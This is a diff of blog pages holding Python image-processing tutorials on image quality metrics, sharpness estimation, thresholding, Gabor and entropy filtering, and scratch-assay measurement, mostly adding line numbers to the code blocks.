                      print("MSE: based on scikit-image = ", mse_skimg)
                      psnr_skimg = metrics.peak_signal_noise_ratio(ref_img, img, data_range=None)
                      print("PSNR: based on scikit-image = ", psnr_skimg)
                      rmse_skimg = metrics.normalized_root_mse(ref_img, img)
                      print("RMSE: based on scikit-image = ", rmse_skimg)
                      from skimage.metrics import structural_similarity as ssim
                      ssim_skimg = ssim(ref_img, img,
                      data_range = img.max() - img.min(),
                      multichannel = True)
                      print("SSIM: based on scikit-image = ", ssim_skimg)
                      MSE: based on scikit-image =  0.0
                       PSNR: based on scikit-image =  inf
                       RMSE: based on scikit-image =  0.0
                      @@ -449,47 +447,47 @@ 

                      -
                      ref_img = cv2.imread("images/sandstone.tif", 1)
                      img = cv2.imread("images/sandstone_blur_2sigma.tif", 1)
                      +
                      1
                      2
                      ref_img = cv2.imread("images/sandstone.tif", 1)
                      img = cv2.imread("images/sandstone_blur_2sigma.tif", 1)
                      • ERGAS Global relative error
                      -
                      """
                      calculates global relative error

                      GT: first (original) input image.
                      P: second (deformed) input image.
                      r: ratio of high resolution to low resolution (default=4).
                      ws: sliding window size (default = 8).

                      :returns: float -- ergas value.
                      """
                      ergas_img = full_ref.ergas(ref_img, img, r=4, ws=8)
                      print("EGRAS: global relative error = ", ergas_img)
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      7
                      8
                      9
                      10
                      11
                      12
                      """
                      calculates global relative error

                      GT: first (original) input image.
                      P: second (deformed) input image.
                      r: ratio of high resolution to low resolution (default=4).
                      ws: sliding window size (default = 8).

                      :returns: float -- ergas value.
                      """
                      ergas_img = full_ref.ergas(ref_img, img, r=4, ws=8)
                      print("EGRAS: global relative error = ", ergas_img)
                      EGRAS: global relative error =  5267.3334783814835
                       
                      • Multiscale structural similarity index
                      -
                      """calculates multi-scale structural similarity index (ms-ssim).

                      :param GT: first (original) input image.
                      :param P: second (deformed) input image.
                      :param weights: weights for each scale (default = [0.0448, 0.2856, 0.3001, 0.2363, 0.1333]).
                      :param ws: sliding window size (default = 11).
                      :param K1: First constant for SSIM (default = 0.01).
                      :param K2: Second constant for SSIM (default = 0.03).
                      :param MAX: Maximum value of datarange (if None, MAX is calculated using image dtype).

                      :returns: float -- ms-ssim value.
                      """
                      msssim_img=full_ref.msssim(ref_img, img, weights=[0.0448, 0.2856, 0.3001, 0.2363, 0.1333], ws=11, K1=0.01, K2=0.03, MAX=None)
                      print("MSSSIM: multi-scale structural similarity index = ", msssim_img)
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      7
                      8
                      9
                      10
                      11
                      12
                      13
                      14
                      """calculates multi-scale structural similarity index (ms-ssim).

                      :param GT: first (original) input image.
                      :param P: second (deformed) input image.
                      :param weights: weights for each scale (default = [0.0448, 0.2856, 0.3001, 0.2363, 0.1333]).
                      :param ws: sliding window size (default = 11).
                      :param K1: First constant for SSIM (default = 0.01).
                      :param K2: Second constant for SSIM (default = 0.03).
                      :param MAX: Maximum value of datarange (if None, MAX is calculated using image dtype).

                      :returns: float -- ms-ssim value.
                      """
                      msssim_img=full_ref.msssim(ref_img, img, weights=[0.0448, 0.2856, 0.3001, 0.2363, 0.1333], ws=11, K1=0.01, K2=0.03, MAX=None)
                      print("MSSSIM: multi-scale structural similarity index = ", msssim_img)
                      MSSSIM: multi-scale structural similarity index =  (0.8966196945619169+0j)
                       
                      • PSNR
                      -
                      """calculates peak signal-to-noise ratio (psnr).

                      :param GT: first (original) input image.
                      :param P: second (deformed) input image.
                      :param MAX: maximum value of datarange (if None, MAX is calculated using image dtype).

                      :returns: float -- psnr value in dB.
                      """
                      psnr_img=full_ref.psnr(ref_img, img, MAX=None)
                      print("PSNR: peak signal-to-noise ratio = ", psnr_img)
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      7
                      8
                      9
                      10
                      """calculates peak signal-to-noise ratio (psnr).

                      :param GT: first (original) input image.
                      :param P: second (deformed) input image.
                      :param MAX: maximum value of datarange (if None, MAX is calculated using image dtype).

                      :returns: float -- psnr value in dB.
                      """
                      psnr_img=full_ref.psnr(ref_img, img, MAX=None)
                      print("PSNR: peak signal-to-noise ratio = ", psnr_img)
                      PSNR: peak signal-to-noise ratio =  25.80492671881574
                       
                      • PSNRB: Calculates PSNR with Blocking Effect Factor for a given pair of images (PSNR-B)
                      -
                      """Calculates PSNR with Blocking Effect Factor for a given pair of images (PSNR-B)

                      :param GT: first (original) input image in YCbCr format or Grayscale.
                      :param P: second (corrected) input image in YCbCr format or Grayscale.

                      :return: float -- psnr_b.
                      """
                      psnrb_img = full_ref.psnrb(ref_img, img)
                      print("PSNRB: peak signal-to-noise ratio with blocking effect = ", psnrb_img)
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      7
                      8
                      9
                      """Calculates PSNR with Blocking Effect Factor for a given pair of images (PSNR-B)

                      :param GT: first (original) input image in YCbCr format or Grayscale.
                      :param P: second (corrected) input image in YCbCr format or Grayscale.

                      :return: float -- psnr_b.
                      """
                      psnrb_img = full_ref.psnrb(ref_img, img)
                      print("PSNRB: peak signal-to-noise ratio with blocking effect = ", psnrb_img)
                      PSNRB: peak signal-to-noise ratio with blocking effect =  25.80492671881574
                       
                      • relative average spectral error (rase)
                      -
                      """calculates relative average spectral error (rase).

                      :param GT: first (original) input image.
                      :param P: second (deformed) input image.
                      :param ws: sliding window size (default = 8).

                      :returns: float -- rase value.
                      """
                      RASE_img = full_ref.rase(ref_img, img, ws=8)
                      print("RASE: relative average spectral error = ", RASE_img)
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      7
                      8
                      9
                      10
                      """calculates relative average spectral error (rase).

                      :param GT: first (original) input image.
                      :param P: second (deformed) input image.
                      :param ws: sliding window size (default = 8).

                      :returns: float -- rase value.
                      """
                      RASE_img = full_ref.rase(ref_img, img, ws=8)
                      print("RASE: relative average spectral error = ", RASE_img)
                      RASE: relative average spectral error =  760.2741004137694
                       
                      • RMSE
                      -
                      """calculates root mean squared error (rmse).

                      :param GT: first (original) input image.
                      :param P: second (deformed) input image.

                      :returns: float -- rmse value.
                      """
                      rmse_img = full_ref.rmse(ref_img, img)
                      print("RMSE: root mean squared error = ", rmse_img)
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      7
                      8
                      9
                      """calculates root mean squared error (rmse).

                      :param GT: first (original) input image.
                      :param P: second (deformed) input image.

                      :returns: float -- rmse value.
                      """
                      rmse_img = full_ref.rmse(ref_img, img)
                      print("RMSE: root mean squared error = ", rmse_img)
                      RMSE: root mean squared error =  13.07054944944854
                       
                      • root mean squared error (rmse) using sliding window
                      -
                      """calculates root mean squared error (rmse) using sliding window.

                      :param GT: first (original) input image.
                      :param P: second (deformed) input image.
                      :param ws: sliding window size (default = 8).

                      :returns: tuple -- rmse value,rmse map.
                      """
                      rmse_sw_img = full_ref.rmse_sw(ref_img, img, ws=8)
                      print("RMSE_SW: root mean squared error with sliding window = ", rmse_sw_img)
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      7
                      8
                      9
                      10
                      """calculates root mean squared error (rmse) using sliding window.

                      :param GT: first (original) input image.
                      :param P: second (deformed) input image.
                      :param ws: sliding window size (default = 8).

                      :returns: tuple -- rmse value,rmse map.
                      """
                      rmse_sw_img = full_ref.rmse_sw(ref_img, img, ws=8)
                      print("RMSE_SW: root mean squared error with sliding window = ", rmse_sw_img)
                      RMSE_SW: root mean squared error with sliding window =  (11.495024661505164, array([[[6.31466547, 6.31466547, 6.31466547],
                               [6.34182545, 6.34182545, 6.34182545],
                               [6.10327781, 6.10327781, 6.10327781],
                      @@ -543,25 +541,25 @@ 

                    • calculates spectral angle mapper (sam).
                    -
                    """calculates spectral angle mapper (sam).

                    :param GT: first (original) input image.
                    :param P: second (deformed) input image.

                    :returns: float -- sam value.
                    """
                    ref_sam_img = full_ref.sam(ref_img, img)
                    print("REF_SAM: spectral angle mapper = ", ref_sam_img)
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    8
                    9
                    """calculates spectral angle mapper (sam).

                    :param GT: first (original) input image.
                    :param P: second (deformed) input image.

                    :returns: float -- sam value.
                    """
                    ref_sam_img = full_ref.sam(ref_img, img)
                    print("REF_SAM: spectral angle mapper = ", ref_sam_img)
                    REF_SAM: spectral angle mapper =  0.106389325534101
                     
                    • Structural similarity index
                    -
                    """calculates structural similarity index (ssim).

                    :param GT: first (original) input image.
                    :param P: second (deformed) input image.
                    :param ws: sliding window size (default = 8).
                    :param K1: First constant for SSIM (default = 0.01).
                    :param K2: Second constant for SSIM (default = 0.03).
                    :param MAX: Maximum value of datarange (if None, MAX is calculated using image dtype).

                    :returns: tuple -- ssim value, cs value.
                    """
                    ssim_img = full_ref.ssim(ref_img, img, ws=11, K1=0.01, K2=0.03, MAX=None, fltr_specs=None, mode='valid')
                    print("SSIM: structural similarity index = ", ssim_img)
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    8
                    9
                    10
                    11
                    12
                    13
                    """calculates structural similarity index (ssim).

                    :param GT: first (original) input image.
                    :param P: second (deformed) input image.
                    :param ws: sliding window size (default = 8).
                    :param K1: First constant for SSIM (default = 0.01).
                    :param K2: Second constant for SSIM (default = 0.03).
                    :param MAX: Maximum value of datarange (if None, MAX is calculated using image dtype).

                    :returns: tuple -- ssim value, cs value.
                    """
                    ssim_img = full_ref.ssim(ref_img, img, ws=11, K1=0.01, K2=0.03, MAX=None, fltr_specs=None, mode='valid')
                    print("SSIM: structural similarity index = ", ssim_img)
                    SSIM: structural similarity index =  (0.7221593484301166, 0.7224356503602157)
                     
                    • Universal image quality index
                    -
                    """calculates universal image quality index (uqi).

                    :param GT: first (original) input image.
                    :param P: second (deformed) input image.
                    :param ws: sliding window size (default = 8).

                    :returns: float -- uqi value.
                    """
                    UQI_img = full_ref.uqi(ref_img, img, ws=8)
                    print("UQI: universal image quality index = ", UQI_img)
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    8
                    9
                    10
                    """calculates universal image quality index (uqi).

                    :param GT: first (original) input image.
                    :param P: second (deformed) input image.
                    :param ws: sliding window size (default = 8).

                    :returns: float -- uqi value.
                    """
                    UQI_img = full_ref.uqi(ref_img, img, ws=8)
                    print("UQI: universal image quality index = ", UQI_img)
                    UQI: universal image quality index =  0.9892148366610988
                     
                    • Pixel Based Visual Information Fidelity (vif-p)
                    -
                    """calculates Pixel Based Visual Information Fidelity (vif-p).

                    :param GT: first (original) input image.
                    :param P: second (deformed) input image.
                    :param sigma_nsq: variance of the visual noise (default = 2)

                    :returns: float -- vif-p value.
                    """
                    VIFP_img = full_ref.vifp(ref_img, img, sigma_nsq=2)
                    print("VIFP: Pixel Based Visual Information Fidelity = ", VIFP_img)
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    8
                    9
                    10
                    """calculates Pixel Based Visual Information Fidelity (vif-p).

                    :param GT: first (original) input image.
                    :param P: second (deformed) input image.
                    :param sigma_nsq: variance of the visual noise (default = 2)

                    :returns: float -- vif-p value.
                    """
                    VIFP_img = full_ref.vifp(ref_img, img, sigma_nsq=2)
                    print("VIFP: Pixel Based Visual Information Fidelity = ", VIFP_img)
                    VIFP: Pixel Based Visual Information Fidelity =  0.27836263237462544
                     

                    Tutorial 49 - No reference based image quality estimation by quantifying sharpness

                    @@ -575,7 +573,7 @@

                    Sharpness Estimation for Document and Scene Images

                    -
                    pip install -e.
                    +
                    1
                    pip install -e.
                    Obtaining file:///C:/Users/gzjzx/Jupyter/DIP/pydom-master
                       Preparing metadata (setup.py): started
                       Preparing metadata (setup.py): finished with status 'done'
                    @@ -586,12 +584,12 @@ 

                    from dom import DOM
                    import cv2

                    img1 = cv2.imread("images/Osteosarcoma_01.tif", 1)
                    img2 = cv2.imread("images/Osteosarcoma_01_1sigma_blur.tif", 1)
                    img3 = cv2.imread("images/Osteosarcoma_01_2sigma_blur.tif", 1)
                    -
                    iqa = DOM()
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    from dom import DOM
                    import cv2

                    img1 = cv2.imread("images/Osteosarcoma_01.tif", 1)
                    img2 = cv2.imread("images/Osteosarcoma_01_1sigma_blur.tif", 1)
                    img3 = cv2.imread("images/Osteosarcoma_01_2sigma_blur.tif", 1)
                    +
                    1
                    iqa = DOM()
                    • 计算清晰度指数:
                    -
                    score1 = iqa.get_sharpness(img1)
                    score2 = iqa.get_sharpness(img2)
                    score3 = iqa.get_sharpness(img3)

                    print("Sharpness for reference image:", score1)
                    print("Sharpness for 1sigma blurred image:", score2)
                    print("Sharpness for 2sigma blurred image:", score3)
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    score1 = iqa.get_sharpness(img1)
                    score2 = iqa.get_sharpness(img2)
                    score3 = iqa.get_sharpness(img3)

                    print("Sharpness for reference image:", score1)
                    print("Sharpness for 1sigma blurred image:", score2)
                    print("Sharpness for 2sigma blurred image:", score3)
                    Sharpness for reference image: 0.720903262659802
                     Sharpness for 1sigma blurred image: 0.8156158621086446
                     Sharpness for 2sigma blurred image: 0.5502472959626157
                    @@ -627,11 +625,11 @@ 

                  -
                  pip install image-quality
                  -
                  import numpy as np
                  from skimage import io, img_as_float
                  import imquality.brisque as brisque
                  +
                  1
                  pip install image-quality
                  +
                  1
                  2
                  3
                  import numpy as np
                  from skimage import io, img_as_float
                  import imquality.brisque as brisque

                  暂时跑不了…过段时间再解决?

                  -
                  #img = img_as_float(io.imread('noisy_images/BSE.jpg', as_gray=True))
                  img = img_as_float(io.imread('images/noisy_images/sandstone_25sigma_noisy.tif', as_gray=True))

                  score = brisque.score(img)
                  print("Brisque score = ", score)

                  # Now let us check BRISQUE scores for a few blurred images.

                  img0 = img_as_float(io.imread('images/blurred_images/sandstone.tif', as_gray=True))
                  img2 = img_as_float(io.imread('images/blurred_images/sandstone_2sigma_blur.tif', as_gray=True))
                  img3 = img_as_float(io.imread('images/blurred_images/sandstone_3sigma_blur.tif', as_gray=True))
                  img5 = img_as_float(io.imread('images/blurred_images/sandstone_5sigma_blur.tif', as_gray=True))

                  score0 = brisque.score(img0)
                  score2 = brisque.score(img2)
                  score3 = brisque.score(img3)
                  score5 = brisque.score(img5)

                  print("BRISQUE Score for 0 blur = ", score0)
                  print("BRISQUE Score for 2sigma blur = ", score2)
                  print("BRISQUE Score for 3sigma blur = ", score3)
                  print("BRISQUE Score for 5sigma blur = ", score5)
                  -
                  from skimage.metrics import peak_signal_noise_ratio

                  psnr_1 = peak_signal_noise_ratio(img0, img1)
                  psnr_2 = peak_signal_noise_ratio(img0, img2)

                  print("PSNR for 1sigma blur = ", psnr_1)
                  print("PSNR for 2sigma blur = ", psnr_2)
                  +
                  1
                  2
                  3
                  4
                  5
                  6
                  7
                  8
                  9
                  10
                  11
                  12
                  13
                  14
                  15
                  16
                  17
                  18
                  19
                  20
                  21
                  22
                  #img = img_as_float(io.imread('noisy_images/BSE.jpg', as_gray=True))
                  img = img_as_float(io.imread('images/noisy_images/sandstone_25sigma_noisy.tif', as_gray=True))

                  score = brisque.score(img)
                  print("Brisque score = ", score)

                  # Now let us check BRISQUE scores for a few blurred images.

                  img0 = img_as_float(io.imread('images/blurred_images/sandstone.tif', as_gray=True))
                  img2 = img_as_float(io.imread('images/blurred_images/sandstone_2sigma_blur.tif', as_gray=True))
                  img3 = img_as_float(io.imread('images/blurred_images/sandstone_3sigma_blur.tif', as_gray=True))
                  img5 = img_as_float(io.imread('images/blurred_images/sandstone_5sigma_blur.tif', as_gray=True))

                  score0 = brisque.score(img0)
                  score2 = brisque.score(img2)
                  score3 = brisque.score(img3)
                  score5 = brisque.score(img5)

                  print("BRISQUE Score for 0 blur = ", score0)
                  print("BRISQUE Score for 2sigma blur = ", score2)
                  print("BRISQUE Score for 3sigma blur = ", score3)
                  print("BRISQUE Score for 5sigma blur = ", score5)
                  +
                  1
                  2
                  3
                  4
                  5
                  6
                  7
                  from skimage.metrics import peak_signal_noise_ratio

                  psnr_1 = peak_signal_noise_ratio(img0, img1)
                  psnr_2 = peak_signal_noise_ratio(img0, img2)

                  print("PSNR for 1sigma blur = ", psnr_1)
                  print("PSNR for 2sigma blur = ", psnr_2)
                  PSNR for 1sigma blur =  37.288893529075025
                   PSNR for 2sigma blur =  33.23605158876105
                   
                  @@ -4667,6 +4665,8 @@

                  目录

                  var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/DIP-Introductory python tutorials for image processing(51-58)-Image Segmentation/index.html b/posts/DIP-Introductory python tutorials for image processing(51-58)-Image Segmentation/index.html index b38313d218..f24f3922ff 100644 --- a/posts/DIP-Introductory python tutorials for image processing(51-58)-Image Segmentation/index.html +++ b/posts/DIP-Introductory python tutorials for image processing(51-58)-Image Segmentation/index.html @@ -44,8 +44,6 @@ - - @@ -415,7 +413,7 @@

                  png

                  OpenCV —— 阈值分割(直方图技术法,熵算法,Otsu,自适应阈值算法)

                  -
                  import cv2
                  import matplotlib.pyplot as plt

                  img = cv2.imread("images/Osteosarcoma_01.tif", 1)
                  plt.imshow(img[:,:,::-1])
                  +
                  1
                  2
                  3
                  4
                  5
                  import cv2
                  import matplotlib.pyplot as plt

                  img = cv2.imread("images/Osteosarcoma_01.tif", 1)
                  plt.imshow(img[:,:,::-1])
                  <matplotlib.image.AxesImage at 0x15586e075e0>
                   

                  png

                  @@ -426,11 +424,11 @@

                -
                blue_channel = img[:,:,0]
                plt.imshow(blue_channel, cmap="gray")
                +
                1
                2
                blue_channel = img[:,:,0]
                plt.imshow(blue_channel, cmap="gray")
                <matplotlib.image.AxesImage at 0x20c6bc29a60>
                 

                png

                -
                plt.hist(blue_channel.flat, bins=100, range=(0, 120))
                +
                1
                plt.hist(blue_channel.flat, bins=100, range=(0, 120))
                (array([8.12033e+05, 3.47050e+04, 2.10950e+04, 3.48210e+04, 4.78370e+04,
                         1.07928e+05, 5.22380e+04, 4.82100e+04, 4.30030e+04, 3.66300e+04,
                         5.45780e+04, 2.04160e+04, 1.62930e+04, 1.28170e+04, 1.05070e+04,
                @@ -478,7 +476,7 @@ 

              -
              background = (blue_channel <= 40)
              nuclei = (blue_channel > 40)
              plt.imshow(nuclei, cmap="gray")
              +
              1
              2
              3
              background = (blue_channel <= 40)
              nuclei = (blue_channel > 40)
              plt.imshow(nuclei, cmap="gray")
              <matplotlib.image.AxesImage at 0x20c6bb277f0>
               

              png

              @@ -499,7 +497,7 @@

            -
            ret1, thresh1 = cv2.threshold(blue_channel, 40, 255, cv2.THRESH_BINARY)
            ret1, thresh1
            +
            1
            2
            ret1, thresh1 = cv2.threshold(blue_channel, 40, 255, cv2.THRESH_BINARY)
            ret1, thresh1
            (40.0,
              array([[255, 255, 255, ...,   0,   0,   0],
                     [255, 255, 255, ...,   0,   0,   0],
            @@ -509,7 +507,7 @@ 

            -
            plt.imshow(thresh1, cmap="gray")
            +
            1
            plt.imshow(thresh1, cmap="gray")
            <matplotlib.image.AxesImage at 0x20c00133220>
             

            png

            @@ -526,7 +524,7 @@

          -
          ret2, thresh2 = cv2.threshold(blue_channel, 0, 255, cv2.THRESH_BINARY +  cv2.THRESH_OTSU)
          ret2, thresh2
          +
          1
          2
          ret2, thresh2 = cv2.threshold(blue_channel, 0, 255, cv2.THRESH_BINARY +  cv2.THRESH_OTSU)
          ret2, thresh2
          (50.0,
            array([[255, 255,   0, ...,   0,   0,   0],
                   [255, 255, 255, ...,   0,   0,   0],
          @@ -559,18 +557,18 @@ 

        -
        import numpy as np

        regions1 = np.digitize(blue_channel, bins=np.array([ret2]))
        plt.imshow(regions1)
        +
        1
        2
        3
        4
        import numpy as np

        regions1 = np.digitize(blue_channel, bins=np.array([ret2]))
        plt.imshow(regions1)
        <matplotlib.image.AxesImage at 0x20c00a05ca0>
         

        png

        Tutorial 52 - Auto-thresholding for multiple regions _using multi-otsu

        -
        from matplotlib import pyplot as plt
        import numpy as np
        from skimage.filters import threshold_multiotsu
        import cv2
        -
        img = cv2.imread("images/BSE.tif", 0)
        -
        plt.imshow(img, cmap="gray")
        +
        1
        2
        3
        4
        from matplotlib import pyplot as plt
        import numpy as np
        from skimage.filters import threshold_multiotsu
        import cv2
        +
        1
        img = cv2.imread("images/BSE.tif", 0)
        +
        1
        plt.imshow(img, cmap="gray")
        <matplotlib.image.AxesImage at 0x163340e4e20>
         

        png

        -
        # .flat returns the flattened numpy array (1D)
        plt.hist(img.flat, bins=100, range=(100, 255))
        +
        1
        2
        # .flat returns the flattened numpy array (1D)
        plt.hist(img.flat, bins=100, range=(100, 255))
        (array([ 1503.,  4537.,  3200.,  4608.,  5865.,  7691.,  9625., 25963.,
                     0., 33377., 18666., 19131., 36722.,     0., 31707., 13031.,
                 10769.,  8827.,  6923.,  5264.,  7160.,  2595.,  1889.,  1722.,
        @@ -608,8 +606,8 @@ 

      -
      region1 = (img >= 0) & (img <75)
      region2 = (img >= 75) & (img <140)
      region3 = (img >= 140) & (img <200)
      region4 = (img >= 200) & (img <=255)
      # Create 3 channel blank image of same size as original
      # 创建 3 通道空白图像,大小与原始图像相同
      all_regions = np.zeros((img.shape[0], img.shape[1], 3))
      all_regions[region1] = (1,0,0) # 红
      all_regions[region2] = (0,1,0) # 绿
      all_regions[region3] = (0,0,1) # 蓝
      all_regions[region4] = (1,1,0) # 黄
      -
      all_regions
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      region1 = (img >= 0) & (img <75)
      region2 = (img >= 75) & (img <140)
      region3 = (img >= 140) & (img <200)
      region4 = (img >= 200) & (img <=255)
      # Create 3 channel blank image of same size as original
      # 创建 3 通道空白图像,大小与原始图像相同
      all_regions = np.zeros((img.shape[0], img.shape[1], 3))
      all_regions[region1] = (1,0,0) # 红
      all_regions[region2] = (0,1,0) # 绿
      all_regions[region3] = (0,0,1) # 蓝
      all_regions[region4] = (1,1,0) # 黄
      +
      1
      all_regions
      array([[[0., 0., 1.],
               [0., 0., 1.],
               [0., 0., 1.],
      @@ -660,12 +658,12 @@ 

      -
      plt.imshow(all_regions)
      +
      1
      plt.imshow(all_regions)
      <matplotlib.image.AxesImage at 0x16334046340>
       

      png

      AUTO 自动

      -
      # Apply multi-Otsu threshold 
      thresholds = threshold_multiotsu(img, classes=4)
      +
      1
      2
      # Apply multi-Otsu threshold 
      thresholds = threshold_multiotsu(img, classes=4)
      • Digitize (segment) original image into multiple classes.
          @@ -675,11 +673,11 @@

          np.digitize assign values 0, 1, 2, 3, … to pixels in each class.

        将原始图像数字化(分割)成多个类。

        -
        regions = np.digitize(img, bins=thresholds)
        plt.imshow(regions)
        +
        1
        2
        regions = np.digitize(img, bins=thresholds)
        plt.imshow(regions)
        <matplotlib.image.AxesImage at 0x163340a6a30>
         

        png

        -
        segm1 = (regions == 0)
        segm2 = (regions == 1)
        segm3 = (regions == 2)
        segm4 = (regions == 3)
        +
        1
        2
        3
        4
        segm1 = (regions == 0)
        segm2 = (regions == 1)
        segm3 = (regions == 2)
        segm4 = (regions == 3)

        OpenCV 图像处理之膨胀与腐蚀

        • We can use binary opening and closing operations to clean up. @@ -699,7 +697,7 @@

        png

        -
        from scipy import ndimage as nd

        segm1_opened = nd.binary_opening(segm1, np.ones((3,3)))
        segm1_closed = nd.binary_closing(segm1_opened, np.ones((3,3)))

        segm2_opened = nd.binary_opening(segm2, np.ones((3,3)))
        segm2_closed = nd.binary_closing(segm2_opened, np.ones((3,3)))

        segm3_opened = nd.binary_opening(segm3, np.ones((3,3)))
        segm3_closed = nd.binary_closing(segm3_opened, np.ones((3,3)))

        segm4_opened = nd.binary_opening(segm4, np.ones((3,3)))
        segm4_closed = nd.binary_closing(segm4_opened, np.ones((3,3)))

        all_segments_cleaned = np.zeros((img.shape[0], img.shape[1], 3))

        all_segments_cleaned[segm1_closed] = (1,0,0)
        all_segments_cleaned[segm2_closed] = (0,1,0)
        all_segments_cleaned[segm3_closed] = (0,0,1)
        all_segments_cleaned[segm4_closed] = (1,1,0)

        plt.imshow(all_segments_cleaned) # All the noise should be cleaned now
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        from scipy import ndimage as nd

        segm1_opened = nd.binary_opening(segm1, np.ones((3,3)))
        segm1_closed = nd.binary_closing(segm1_opened, np.ones((3,3)))

        segm2_opened = nd.binary_opening(segm2, np.ones((3,3)))
        segm2_closed = nd.binary_closing(segm2_opened, np.ones((3,3)))

        segm3_opened = nd.binary_opening(segm3, np.ones((3,3)))
        segm3_closed = nd.binary_closing(segm3_opened, np.ones((3,3)))

        segm4_opened = nd.binary_opening(segm4, np.ones((3,3)))
        segm4_closed = nd.binary_closing(segm4_opened, np.ones((3,3)))

        all_segments_cleaned = np.zeros((img.shape[0], img.shape[1], 3))

        all_segments_cleaned[segm1_closed] = (1,0,0)
        all_segments_cleaned[segm2_closed] = (0,1,0)
        all_segments_cleaned[segm3_closed] = (0,0,1)
        all_segments_cleaned[segm4_closed] = (1,1,0)

        plt.imshow(all_segments_cleaned) # All the noise should be cleaned now
        <matplotlib.image.AxesImage at 0x1633505ba00>
         

        png

        @@ -723,8 +721,8 @@

        其中:

        $x’=x\cos(\theta)+y\sin(\theta)$

        $y’=-x\sin(\theta)+y\cos(\theta)$

        -
        import matplotlib.pyplot as plt
        from skimage import io
        import numpy as np
        from skimage.filters import threshold_otsu
        import cv2
        -
        img = io.imread("images/Scratch0.jpg", as_gray=True)
        plt.imshow(img, cmap="gray")
        +
        1
        2
        3
        4
        5
        import matplotlib.pyplot as plt
        from skimage import io
        import numpy as np
        from skimage.filters import threshold_otsu
        import cv2
        +
        1
        2
        img = io.imread("images/Scratch0.jpg", as_gray=True)
        plt.imshow(img, cmap="gray")
        <matplotlib.image.AxesImage at 0x22ee31fc790>
         

        png

        @@ -736,7 +734,7 @@

      -
      from scipy import ndimage 

      k = 7
      img_mean = ndimage.uniform_filter(img, (k, k))
      img_sqr_mean = ndimage.uniform_filter(img ** 2, (k, k))
      img_var = img_sqr_mean - img_mean ** 2
      plt.imshow(img_var, cmap='gray')
      +
      1
      2
      3
      4
      5
      6
      7
      from scipy import ndimage 

      k = 7
      img_mean = ndimage.uniform_filter(img, (k, k))
      img_sqr_mean = ndimage.uniform_filter(img ** 2, (k, k))
      img_var = img_sqr_mean - img_mean ** 2
      plt.imshow(img_var, cmap='gray')
      <matplotlib.image.AxesImage at 0x22ee37a4d90>
       

      png

      @@ -755,7 +753,7 @@

    -
    ksize = 45
    theta = np.pi / 4
    kernel = cv2.getGaborKernel((ksize, ksize), 5.0, theta, 10.0, 0.9, 0, ktype=cv2.CV_32F)
    filtered_image = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    plt.imshow(filtered_image, cmap='gray')
    +
    1
    2
    3
    4
    5
    ksize = 45
    theta = np.pi / 4
    kernel = cv2.getGaborKernel((ksize, ksize), 5.0, theta, 10.0, 0.9, 0, ktype=cv2.CV_32F)
    filtered_image = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    plt.imshow(filtered_image, cmap='gray')
    <matplotlib.image.AxesImage at 0x22ee37d7430>
     

    png

    @@ -773,7 +771,7 @@

    -
    from skimage.filters.rank import entropy
    from skimage.morphology import disk

    entropy_img = entropy(img, disk(3))
    plt.imshow(entropy_img)
    +
    1
    2
    3
    4
    5
    from skimage.filters.rank import entropy
    from skimage.morphology import disk

    entropy_img = entropy(img, disk(3))
    plt.imshow(entropy_img)
    <matplotlib.image.AxesImage at 0x22ee39d3d60>
     

    png

    @@ -791,7 +789,7 @@

    -
    plt.hist(entropy_img.flat, bins=100, range=(0,5))  #.flat returns the flattened numpy array (1D)
    +
    1
    plt.hist(entropy_img.flat, bins=100, range=(0,5))  #.flat returns the flattened numpy array (1D)
    (array([2.4906e+04, 0.0000e+00, 0.0000e+00, 0.0000e+00, 1.2640e+03,
             4.0000e+00, 1.1000e+01, 3.4300e+02, 5.5700e+02, 1.0300e+02,
             5.0000e+00, 6.8000e+02, 1.1500e+02, 3.4200e+02, 3.2900e+02,
    @@ -832,14 +830,14 @@ 

    -
    thresh = threshold_otsu(entropy_img)
    thresh
    +
    1
    2
    thresh = threshold_otsu(entropy_img)
    thresh
    1.2953342370696572
     
    -
    binary = entropy_img <= thresh
    plt.imshow(binary)
    +
    1
    2
    binary = entropy_img <= thresh
    plt.imshow(binary)
    <matplotlib.image.AxesImage at 0x22ee3ab2280>
     

    png

    -
    # Sum all pixels in the scratch region (values =1)
    scratch_area = np.sum(binary == 1)
    print("Scratched area is: ", scratch_area, "Square pixels")

    scale = 0.45 # microns / pixel
    print("Scratched area in sq. microns is: ", scratch_area*((scale)**2), "Square pixels")
    +
    1
    2
    3
    4
    5
    6
    # Sum all pixels in the scratch region (values =1)
    scratch_area = np.sum(binary == 1)
    print("Scratched area is: ", scratch_area, "Square pixels")

    scale = 0.45 # microns / pixel
    print("Scratched area in sq. microns is: ", scratch_area*((scale)**2), "Square pixels")
    Scratched area is:  33485 Square pixels
     Scratched area in sq. microns is:  6780.712500000001 Square pixels
     
    @@ -888,7 +886,7 @@

    import matplotlib.pyplot as plt
    from skimage import io
    from skimage.filters.rank import entropy
    from skimage.morphology import disk
    import numpy as np
    from skimage.filters import threshold_otsu
    +
    1
    2
    3
    4
    5
    6
    import matplotlib.pyplot as plt
    from skimage import io
    from skimage.filters.rank import entropy
    from skimage.morphology import disk
    import numpy as np
    from skimage.filters import threshold_otsu
    • Use glob to extract image names and load them.
        @@ -896,8 +894,8 @@

        import glob
        -
        time = 0
        scale = 0.45 # microns/pixel
        time_list = []
        area_list = []
        path = "images/scratch_assay/*.*"
        +
        1
        import glob
        +
        1
        2
        3
        4
        5
        time = 0
        scale = 0.45 # microns/pixel
        time_list = []
        area_list = []
        path = "images/scratch_assay/*.*"
